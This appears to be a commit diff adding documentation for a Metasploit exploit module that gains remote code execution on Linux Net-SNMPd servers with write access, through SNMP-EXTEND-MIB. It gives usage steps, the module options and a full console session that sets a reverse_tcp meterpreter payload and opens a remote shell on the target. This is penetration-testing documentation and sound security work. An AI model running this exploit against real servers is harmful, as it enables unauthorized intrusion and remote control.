Land #9396, Linux net snmpd rw access

2019-11-07 02:35:50 +00:00
parent 0966efce7e 2ab1b9071f
commit 876a307816
2 changed files with 229 additions and 0 deletions
@@ -0,0 +1,123 @@
+## Vulnerable Application
+
+  This module uses SNMP extension MIBs to enable remote code execution on the Linux Net-SNMPD servers using the 
+  SNMP-EXTEND-MIB.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/linux/snmp/net_snmpd_rw_access`
+  3. Do: `set rhost [IP]`
+  4. Do: `set community [SNMP Community]`
+  5. Do: `set version [SNMP Version]`
+  6. Configure the payload
+  7. Do: `run`
+  8. You should get a session
+
+## Options
+  **FILEPATH**  
+  The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.  
+  
+  **COMMUNITY**  
+  The read/write community string of the target Net-SNMP service.
+  
+  **VERSION**  
+  The SNMP protocol version. Accepted values are '1' or '2c'. 
+  
+  **CHUNKSIZE**  
+  The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors  
+  Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors.  
+  This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/].
+  
+  **TIMEOUT**  
+  Specifies the maximum time to allow SNMP to timeout.  
+  
+  **SHELL**  
+  The shell to call for the client. Defaults to '/bin/bash'  
+
+
+  
+## Scenario
+
+  ```
+  msf > use exploit/linux/snmp/net_snmpd_rw_access 
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
+  rhost => 192.168.1.3
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
+  lhost => 192.168.1.2
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
+  community => private
+  msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
+  version => 2c
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > show info
+  
+         Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
+       Module: exploit/linux/snmp/net_snmpd_rw_access
+     Platform: 
+         Arch: 
+   Privileged: No
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+
+  Provided by:
+    Steve Embling at InteliSecure
+
+  Available targets:
+    Id  Name
+    --  ----
+    0   Linux x86
+
+  Basic options:
+    Name       Current Setting  Required  Description
+    ----       ---------------  --------  -----------
+    CHUNKSIZE  200              yes       Maximum bytes of payload to write at once 
+    COMMUNITY  private          yes       SNMP Community String
+    FILEPATH   /tmp             yes       file path to write to 
+    RETRIES    1                yes       SNMP Retries
+    RHOST      192.168.1.3      yes       The target address
+    RPORT      161              yes       The target port (TCP)
+    SHELL      /bin/bash        yes       Shell to call with -c argument
+    SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+    SRVPORT    8080             yes       The local port to listen on.
+    SSL        false            no        Negotiate SSL for incoming connections
+    SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+    TIMEOUT    1                yes       SNMP Timeout
+    URIPATH                     no        The URI to use for this exploit (default is random)
+    VERSION    2c               yes       SNMP Version <1/2c> 
+
+  Payload information:
+    Space: 4096
+
+  Description:
+    This exploit module exploits the SNMP write access configuration 
+    ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to 
+    remote code execution.
+
+  References:
+    https://www.intelisecure.com
+
+  msf exploit(linux/snmp/net_snmpd_rw_access) > run
+  
+  [*] Started reverse TCP handler on 192.168.1.2:4444 
+  [*] Command Stager progress -   1.11% done (199/17924 bytes)
+  [*] Command Stager progress -   2.23% done (399/17924 bytes)
+  [*] Command Stager progress -   3.34% done (598/17924 bytes)
+  [*] Command Stager progress -   4.45% done (797/17924 bytes)
+  ... Redacted ...
+  [*] Command Stager progress -  98.64% done (17681/17924 bytes)
+  [*] Command Stager progress -  99.72% done (17873/17924 bytes)
+  [*] Sending stage (857352 bytes) to 192.168.1.3
+  [*] Meterpreter session 31 opened (192.168.1.2:4444 -> 192.168.1.3:54232) at 2018-02-14 17:30:22 +0000
+  [+] SNMP request timeout (this is promising).
+  [*] Command Stager progress - 100.00% done (18022/18022 bytes)
+
+  
+  meterpreter > getuid
+  Server username: uid=121, gid=129, euid=121, egid=129
+  meterpreter > exit
+  [*] 192.168.1.3 - Meterpreter session 30 closed.  Reason: User exit
+
+  ```